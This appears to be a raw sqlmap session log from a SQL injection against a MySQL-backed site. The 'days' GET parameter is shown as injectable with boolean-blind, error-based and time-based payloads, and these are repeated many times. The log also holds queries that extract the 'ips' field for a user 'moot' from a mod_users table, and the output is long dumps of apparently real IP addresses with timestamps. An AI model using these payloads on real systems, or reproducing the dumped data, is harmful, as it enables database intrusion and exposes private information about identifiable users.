192.68.50":0,"207.237.196.229":0,"70.192.64.236":0,"70.192.86.154":0,"198.228.204.131":0,"70.192.86.57":0,"74.66.8.191":0,"70.192.99.42":0,"70.192.96.242":0,"198.228.207.211":0,"70.192.86.66":0,"198.228.207.150":0,"70.192.96.192":0,"70.192.74.1":0,"71.212.124.188":0,"70.199.133.11":0,"70.199.137.94":0,"70.199.137.114":0,"70.199.137.156":0,"70.199.128.76":0,"70.199.248.4":0,"70.199.224.195":0,"166.147.81.136":0,"70.199.130.200":0,"12.130.106.101":0,"198.228.207.19":0,"198.228.207.145":0,"198.228.204.85":0,"198.228.205.46":0,"198.228.205.143":0,"198.228.207.86":0,"70.192.68.176":0,"70.192.72.154":0,"70.192.64.80":0,"69.124.62.42":0,"70.192.74.115":0,"70.208.72.61":0,"70.208.80.72":0,"85.114.63.138":0,"76.15.59.112":0,"96.238.98.52":0,"70.208.65.116":0,"199.108.71.44":0,"67.139.178.66":0,"199.223.125.130":0,"199.106.166.130":0,"199.106.166.95":0,"199.106.166.10":0,"70.193.132.88":0,"70.193.128.160":0,"70.193.129.178":0,"70.193.136.155":0,"63.133.202.2":0,"70.193.128.219":0,"199.106.165.150":0,"70.208.66.77":0,"70.208.69.81":0,"70.208.64.178":0,"70.208.65.132":0,"70.208.84.252":0,"74.66.10.29":0,"208.105.84.100":0,"198.255.178.112":1397922202,"70.208.86.25":0,"70.208.77.209":0,"70.197.5.20":0,"70.197.5.53":0,"71.141.96.58":0,"70.197.4.200":0,"199.106.164.74":0,"70.208.75.54":0,"198.255.177.61":1393278939,"71.141.96.56":0,"117.55.65.136":0,"117.55.65.133":0,"117.55.65.134":0,"153.120.206.224":1396625609,"117.55.65.135":0,"49.240.26.214":0,"153.120.232.253":0,"70.208.76.201":0,"71.141.103.1":0,"209.118.237.69":0,"70.197.14.104":0,"70.197.0.52":0,"70.197.10.243":0,"70.197.3.113":0,"70.197.15.65":0,"70.197.5.47":0,"205.154.255.206":0,"199.106.164.80":0,"24.90.234.161":1392868758,"199.106.165.16":1393351969,"71.118.69.99":1393436027,"50.131.222.48":1395516029,"2600:1010:b020:6f57:656e:e597:1966:ec2f":1393748114,"70.197.4.102":1393748151,"70.197.12.52":1393787071,"2600:1010:b003:c7ac:2c45:25d:7157:cdfc":1393787087,"24.43.227.7":1394225684,"70.210.128.135":1394268733,"2600:100f:b10e:d3b4:7498:7a7:54b2:7e67":1394262217,"72.234.2.242":1394346178,"70.210.129.162":1394359543,"2600:100f:b11b:2f9e:341b:95ff:37ff:833":1394400970,"70.210.133.231":1394398934,"98.147.124.68":1394418703,"173.197.107.7":1394486191,"2600:100f:b128:db5a:41ac:a4ee:36ab:34e":1394505489,"2600:100f:b11d:1b77:809c:42b:7f4f:3b37":1394513983,"70.210.133.2":1394575048,"2600:100f:b12e:2b8:d1ec:4926:635d:339":1394522956,"70.210.132.44":1394585200,"64.129.1.15":1394656562,"64.129.1.11":1394913797,"70.210.134.50":1394927948,"50.67.162.78":1395387193,"2600:1001:b110:835e:a5c6:96d3:f0db:d8d9":1395621867,"219.166.9.153":1396485863,"111.189.249.53":1396552281,"111.189.248.80":1396625716,"111.189.185.89":1396663246,"111.189.249.126":1396701836,"111.189.184.191":1396713107,"111.189.248.87":1396778806,"111.189.184.206":1396806993,"111.189.249.179":1396841910,"111.189.185.67":1396860723,"111.189.184.218":1396893728,"111.189.184.61":1396931109,"111.189.249.174":1396959967,"70.208.77.101":1397071823,"2600:1001:b119:1a8e:905d:ebf6:3dee:76ed":1397071637,"198.228.207.195":1397583760,"198.228.204.169":1397864032,"98.14.45.231":1397864143,"124.181.137.61":1397921454,"121.219.238.59":1397924151}'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select substr(ips,0,150) from mod_users where username = moot [1]:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select ips substr(ips,0,150) from mod_users where username = moot: None
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select ips substr(ips,4) from mod_users where username = 'moot': None
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select ips from mod_users where username='moot': '{"68.198.92.159":0,"68.198.104.14":0,"76.123.57.50":0,"10.0.0.100":0,"87.254.149.253":0,"72.229.100.100":0,"207.126.64.169":0,"92.225.48.142":0,"69.86.149.163":0,"68.236.163.150":0,"129.44.57.254":0,"69.86.243.82":0,"66.173.155.228":0,"75.217.213.126":0,"98.154.254.67":0,"75.222.189.166":0,"124.217.180.47":0,"96.32.188.208":0,"76.122.97.117":0,"75.213.134.125":0,"75.228.145.73":0,"24.4.137.169":0,"71.141.126.249":0,"75.238.77.16":0,"75.193.212.250":0,"69.86.243.102":0,"75.238.1.141":0,"75.238.2.57":0,"75.239.225.70":0,"75.193.6.108":0,"75.238.110.85":0,"75.235.175.28":0,"75.234.5.152":0,"75.193.166.248":0,"75.236.159.213":0,"75.192.225.153":0,"75.193.224.168":0,"75.199.224.157":0,"75.193.174.193":0,"69.60.16.130":0,"66.92.0.109":0,"206.169.179.202":0,"99.8.185.86":0,"69.97.212.254":0,"75.198.241.130":0,"64.206.151.220":0,"98.210.10.58":0,"75.212.95.42":0,"173.56.80.80":0,"208.90.214.59":0,"69.86.148.42":0,"75.200.26.200":0,"69.86.148.190":0,"72.229.100.161":0,"74.110.179.242":0,"166.248.62.213":0,"69.86.243.13":0,"166.248.1.133":0,"166.248.0.68":0,"166.248.0.24":0,"166.248.0.186":0,"69.86.148.49":0,"219.118.120.8":0,"221.243.26.164":0,"98.210.16.87":0,"50.74.4.178":0,"69.86.148.14":0,"69.86.243.215":0,"67.250.2.243":0,"67.247.29.46":0,"72.43.166.86":0,"208.72.142.22":0,"62.50.198.117":0,"173.245.52.148":0,"98.92.19.86":0,"66.154.114.131":0,"75.37.27.159":0,"208.105.85.202":0,"71.56.181.126":0,"166.248.0.45":0,"208.105.85.213":0,"166.248.18.239":0,"199.106.164.67":0,"166.250.64.50":0,"166.250.71.62":0,"199.106.164.81":0,"208.105.86.3":0,"77.108.161.2":0,"166.248.6.82":0,"70.192.129.3":0,"166.248.1.140":0,"98.117.95.116":0,"173.67.243.126":0,"70.195.192.255":0,"70.195.192.177":0,"70.195.193.29":0,"70.195.192.170":0,"199.106.166.38":0,"70.192.67.24":0,"78.250.183.45":0,"92.226.32.8":0,"92.225.85.52":0,"37.14.171.58":0,"37.14.165.35":0,"79.157.233.162":0,"70.199.129.37":0,"70.199.130.89":0,"70.199.128.176":0,"70.199.130.35":0,"70.199.132.13":0,"166.137.86.235":0,"199.106.164.69":0,"70.197.2.94":0,"70.197.1.138":0,"70.197.0.171":0,"70.197.6.193":0,"71.202.19.140":1393747152,"199.188.194.152":0,"70.197.5.255":0,"199.106.164.77":0,"78.24.18.2":0,"70.197.145.30":0,"66.63.164.214":0,"205.214.226.18":0,"199.188.194.149":0,"69.181.70.170":1393806830,"208.105.86.32":0,"199.106.165.60":0,"98.173.88.102":0,"199.106.165.104":0,"70.192.68.171":0,"199.106.164.82":0,"123.224.230.25":0,"111.191.218.214":0,"113.39.75.70":0,"1.114.221.40":0,"1.114.240.119":0,"203.141.139.162":0,"72.89.40.62":0,"204.152.204.156":0,"204.152.204.165":0,"108.182.31.184":0,"216.214.189.162":0,"216.4.227.71":0,"70.197.68.90":0,"208.115.81.243":0,"70.197.65.64":0,"70.197.65.104":0,"70.199.77.80":0,"70.199.80.225":0,"70.199.83.110":0,"70.199.88.61":0,"70.199.85.170":0,"173.245.57.22":0,"199.106.164.73":0,"70.192.68.129":0,"70.192.86.67":0,"70.196.65.112":0,"70.196.64.92":0,"70.196.66.140":0,"70.196.66.242":0,"96.238.184.54":0,"76.104.11.43":0,"24.44.231.99":0,"160.39.171.85":0,"70.192.76.61":0,"70.192.92.159":0,"66.216.9.130":0,"70.192.75.25":0,"70.192.97.128":0,"70.192.73.188":0,"198.228.194.64":0,"166.147.110.136":0,"166.147.109.87":0,"114.164.237.233":0,"222.151.98.81":0,"166.147.109.232":0,"36.245.210.248":0,"166.147.110.78":0,"101.128.197.51":0,"166.147.111.120":0,"166.147.109.106":0,"166.147.111.131":0,"166.147.110.237":0,"183.177.175.203":0,"123.230.73.94":0,"166.147.110.132":0,"70.192.83.220":0,"66.108.63.147":0,"198.228.205.2":0,"198.228.207.58":0,"198.228.204.24":0,"198.228.207.121":0,"198.228.204.18":0,"198.228.207.59":0,"198.228.204.63":0,"166.147.110.105":0,"166.147.111.105":0,"82.69.8.53":0,"166.147.108.56":0,"166.147.108.90":0,"91.85.229.107":0,"166.147.108.161":0,"217.41.228.62":0,"198.228.205.42":0,"10.0.0.19":1397794249,"198.228.192.65":0,"70.192.72.85":0,"70.192.65.112":0,"70.192.64.22":0,"70.192.68.50":0,"207.237.196.229":0,"70.192.64.236":0,"70.192.86.154":0,"198.228.204.131":0,"70.192.86.57":0,"74.66.8.191":0,"70.192.99.42":0,"70.192.96.242":0,"198.228.207.211":0,"70.192.86.66":0,"198.228.207.150":0,"70.192.96.192":0,"70.192.74.1":0,"71.212.124.188":0,"70.199.133.11":0,"70.199.137.94":0,"70.199.137.114":0,"70.199.137.156":0,"70.199.128.76":0,"70.199.248.4":0,"70.199.224.195":0,"166.147.81.136":0,"70.199.130.200":0,"12.130.106.101":0,"198.228.207.19":0,"198.228.207.145":0,"198.228.204.85":0,"198.228.205.46":0,"198.228.205.143":0,"198.228.207.86":0,"70.192.68.176":0,"70.192.72.154":0,"70.192.64.80":0,"69.124.62.42":0,"70.192.74.115":0,"70.208.72.61":0,"70.208.80.72":0,"85.114.63.138":0,"76.15.59.112":0,"96.238.98.52":0,"70.208.65.116":0,"199.108.71.44":0,"67.139.178.66":0,"199.223.125.130":0,"199.106.166.130":0,"199.106.166.95":0,"199.106.166.10":0,"70.193.132.88":0,"70.193.128.160":0,"70.193.129.178":0,"70.193.136.155":0,"63.133.202.2":0,"70.193.128.219":0,"199.106.165.150":0,"70.208.66.77":0,"70.208.69.81":0,"70.208.64.178":0,"70.208.65.132":0,"70.208.84.252":0,"74.66.10.29":0,"208.105.84.100":0,"198.255.178.112":1397922202,"70.208.86.25":0,"70.208.77.209":0,"70.197.5.20":0,"70.197.5.53":0,"71.141.96.58":0,"70.197.4.200":0,"199.106.164.74":0,"70.208.75.54":0,"198.255.177.61":1393278939,"71.141.96.56":0,"117.55.65.136":0,"117.55.65.133":0,"117.55.65.134":0,"153.120.206.224":1396625609,"117.55.65.135":0,"49.240.26.214":0,"153.120.232.253":0,"70.208.76.201":0,"71.141.103.1":0,"209.118.237.69":0,"70.197.14.104":0,"70.197.0.52":0,"70.197.10.243":0,"70.197.3.113":0,"70.197.15.65":0,"70.197.5.47":0,"205.154.255.206":0,"199.106.164.80":0,"24.90.234.161":1392868758,"199.106.165.16":1393351969,"71.118.69.99":1393436027,"50.131.222.48":1395516029,"2600:1010:b020:6f57:656e:e597:1966:ec2f":1393748114,"70.197.4.102":1393748151,"70.197.12.52":1393787071,"2600:1010:b003:c7ac:2c45:25d:7157:cdfc":1393787087,"24.43.227.7":1394225684,"70.210.128.135":1394268733,"2600:100f:b10e:d3b4:7498:7a7:54b2:7e67":1394262217,"72.234.2.242":1394346178,"70.210.129.162":1394359543,"2600:100f:b11b:2f9e:341b:95ff:37ff:833":1394400970,"70.210.133.231":1394398934,"98.147.124.68":1394418703,"173.197.107.7":1394486191,"2600:100f:b128:db5a:41ac:a4ee:36ab:34e":1394505489,"2600:100f:b11d:1b77:809c:42b:7f4f:3b37":1394513983,"70.210.133.2":1394575048,"2600:100f:b12e:2b8:d1ec:4926:635d:339":1394522956,"70.210.132.44":1394585200,"64.129.1.15":1394656562,"64.129.1.11":1394913797,"70.210.134.50":1394927948,"50.67.162.78":1395387193,"2600:1001:b110:835e:a5c6:96d3:f0db:d8d9":1395621867,"219.166.9.153":1396485863,"111.189.249.53":1396552281,"111.189.248.80":1396625716,"111.189.185.89":1396663246,"111.189.249.126":1396701836,"111.189.184.191":1396713107,"111.189.248.87":1396778806,"111.189.184.206":1396806993,"111.189.249.179":1396841910,"111.189.185.67":1396860723,"111.189.184.218":1396893728,"111.189.184.61":1396931109,"111.189.249.174":1396959967,"70.208.77.101":1397071823,"2600:1001:b119:1a8e:905d:ebf6:3dee:76ed":1397071637,"198.228.207.195":1397583760,"198.228.204.169":1397864032,"98.14.45.231":1397864143,"124.181.137.61":1397921454,"121.219.238.59":1397924151}'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select ips substr(ips,4,5) from mod_users where username = 'moot': None
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select ips substring(ips,4,5) from mod_users where username = 'moot': None
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select substring(ips,4,5) from mod_users where username = 'moot': '8.198'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select substring(ips,0,500) from mod_users where username = 'moot': ''
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select substring(ips,0,50) from mod_users where username = 'moot': ''
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select substring(ips,,50) from mod_users where username = 'moot' [1]:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select substring(ips,6,50) from mod_users where username = 'moot': '198.92.159":0,"68.198.104.14":0,"76.123.57.50":0,"'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select substring(ips,0,50) from mod_users where username = 'moot': ''
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select substring(ips,1,50) from mod_users where username = 'moot': '{"68.198.92.159":0,"68.198.104.14":0,"76.123.57.50'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select substring(ips,1,500) from mod_users where username = 'moot': '{"68.198.92.159":0,"68.198.104.14":0,"76.123.57.50":0,"10.0.0.100":0,"87.254.149.253":0,"72.229.100.100":0,"207.126.64.169":0,"92.225.48.142":0,"69.86.149.163":0,"68.236.163.150":0,"129.44.57.254":0,"69.86.243.82":0,"66.173.155.228":0,"75.217.213.126":0,"98.154.254.67":0,"75.222.189.166":0,"124.217.180.47":0,"96.32.188.208":0,"76.122.97.117":0,"75.213.134.125":0,"75.228.145.73":0,"24.4.137.169":0,"71.141.126.249":0,"75.238.77.16":0,"75.193.212.250":0,"69.86.243.102":0,"75.238.1.141":0,"75.238.2.'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select substring(ips,1,1000) from mod_users where username = 'moot': '{"68.198.92.159":0,"68.198.104.14":0,"76.123.57.50":0,"10.0.0.100":0,"87.254.149.253":0,"72.229.100.100":0,"207.126.64.169":0,"92.225.48.142":0,"69.86.149.163":0,"68.236.163.150":0,"129.44.57.254":0,"69.86.243.82":0,"66.173.155.228":0,"75.217.213.126":0,"98.154.254.67":0,"75.222.189.166":0,"124.217.180.47":0,"96.32.188.208":0,"76.122.97.117":0,"75.213.134.125":0,"75.228.145.73":0,"24.4.137.169":0,"71.141.126.249":0,"75.238.77.16":0,"75.193.212.250":0,"69.86.243.102":0,"75.238.1.141":0,"75.238.2.57":0,"75.239.225.70":0,"75.193.6.108":0,"75.238.110.85":0,"75.235.175.28":0,"75.234.5.152":0,"75.193.166.248":0,"75.236.159.213":0,"75.192.225.153":0,"75.193.224.168":0,"75.199.224.157":0,"75.193.174.193":0,"69.60.16.130":0,"66.92.0.109":0,"206.169.179.202":0,"99.8.185.86":0,"69.97.212.254":0,"75.198.241.130":0,"64.206.151.220":0,"98.210.10.58":0,"75.212.95.42":0,"173.56.80.80":0,"208.90.214.59":0,"69.86.148.42":0,"75.200.26.200":0,"69.86.148.190":0,"72.229.100.161":0,"74.110.179.242":0,"166.24'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select substring(ips,1,6950) from mod_users where username = 'moot': '{"68.198.92.159":0,"68.198.104.14":0,"76.123.57.50":0,"10.0.0.100":0,"87.254.149.253":0,"72.229.100.100":0,"207.126.64.169":0,"92.225.48.142":0,"69.86.149.163":0,"68.236.163.150":0,"129.44.57.254":0,"69.86.243.82":0,"66.173.155.228":0,"75.217.213.126":0,"98.154.254.67":0,"75.222.189.166":0,"124.217.180.47":0,"96.32.188.208":0,"76.122.97.117":0,"75.213.134.125":0,"75.228.145.73":0,"24.4.137.169":0,"71.141.126.249":0,"75.238.77.16":0,"75.193.212.250":0,"69.86.243.102":0,"75.238.1.141":0,"75.238.2.57":0,"75.239.225.70":0,"75.193.6.108":0,"75.238.110.85":0,"75.235.175.28":0,"75.234.5.152":0,"75.193.166.248":0,"75.236.159.213":0,"75.192.225.153":0,"75.193.224.168":0,"75.199.224.157":0,"75.193.174.193":0,"69.60.16.130":0,"66.92.0.109":0,"206.169.179.202":0,"99.8.185.86":0,"69.97.212.254":0,"75.198.241.130":0,"64.206.151.220":0,"98.210.10.58":0,"75.212.95.42":0,"173.56.80.80":0,"208.90.214.59":0,"69.86.148.42":0,"75.200.26.200":0,"69.86.148.190":0,"72.229.100.161":0,"74.110.179.242":0,"166.248.62.213":0,"69.86.243.13":0,"166.248.1.133":0,"166.248.0.68":0,"166.248.0.24":0,"166.248.0.186":0,"69.86.148.49":0,"219.118.120.8":0,"221.243.26.164":0,"98.210.16.87":0,"50.74.4.178":0,"69.86.148.14":0,"69.86.243.215":0,"67.250.2.243":0,"67.247.29.46":0,"72.43.166.86":0,"208.72.142.22":0,"62.50.198.117":0,"173.245.52.148":0,"98.92.19.86":0,"66.154.114.131":0,"75.37.27.159":0,"208.105.85.202":0,"71.56.181.126":0,"166.248.0.45":0,"208.105.85.213":0,"166.248.18.239":0,"199.106.164.67":0,"166.250.64.50":0,"166.250.71.62":0,"199.106.164.81":0,"208.105.86.3":0,"77.108.161.2":0,"166.248.6.82":0,"70.192.129.3":0,"166.248.1.140":0,"98.117.95.116":0,"173.67.243.126":0,"70.195.192.255":0,"70.195.192.177":0,"70.195.193.29":0,"70.195.192.170":0,"199.106.166.38":0,"70.192.67.24":0,"78.250.183.45":0,"92.226.32.8":0,"92.225.85.52":0,"37.14.171.58":0,"37.14.165.35":0,"79.157.233.162":0,"70.199.129.37":0,"70.199.130.89":0,"70.199.128.176":0,"70.199.130.35":0,"70.199.132.13":0,"166.137.86.235":0,"199.106.164.69":0,"70.197.2.94":0,"70.197.1.138":0,"70.197.0.171":0,"70.197.6.193":0,"71.202.19.140":1393747152,"199.188.194.152":0,"70.197.5.255":0,"199.106.164.77":0,"78.24.18.2":0,"70.197.145.30":0,"66.63.164.214":0,"205.214.226.18":0,"199.188.194.149":0,"69.181.70.170":1393806830,"208.105.86.32":0,"199.106.165.60":0,"98.173.88.102":0,"199.106.165.104":0,"70.192.68.171":0,"199.106.164.82":0,"123.224.230.25":0,"111.191.218.214":0,"113.39.75.70":0,"1.114.221.40":0,"1.114.240.119":0,"203.141.139.162":0,"72.89.40.62":0,"204.152.204.156":0,"204.152.204.165":0,"108.182.31.184":0,"216.214.189.162":0,"216.4.227.71":0,"70.197.68.90":0,"208.115.81.243":0,"70.197.65.64":0,"70.197.65.104":0,"70.199.77.80":0,"70.199.80.225":0,"70.199.83.110":0,"70.199.88.61":0,"70.199.85.170":0,"173.245.57.22":0,"199.106.164.73":0,"70.192.68.129":0,"70.192.86.67":0,"70.196.65.112":0,"70.196.64.92":0,"70.196.66.140":0,"70.196.66.242":0,"96.238.184.54":0,"76.104.11.43":0,"24.44.231.99":0,"160.39.171.85":0,"70.192.76.61":0,"70.192.92.159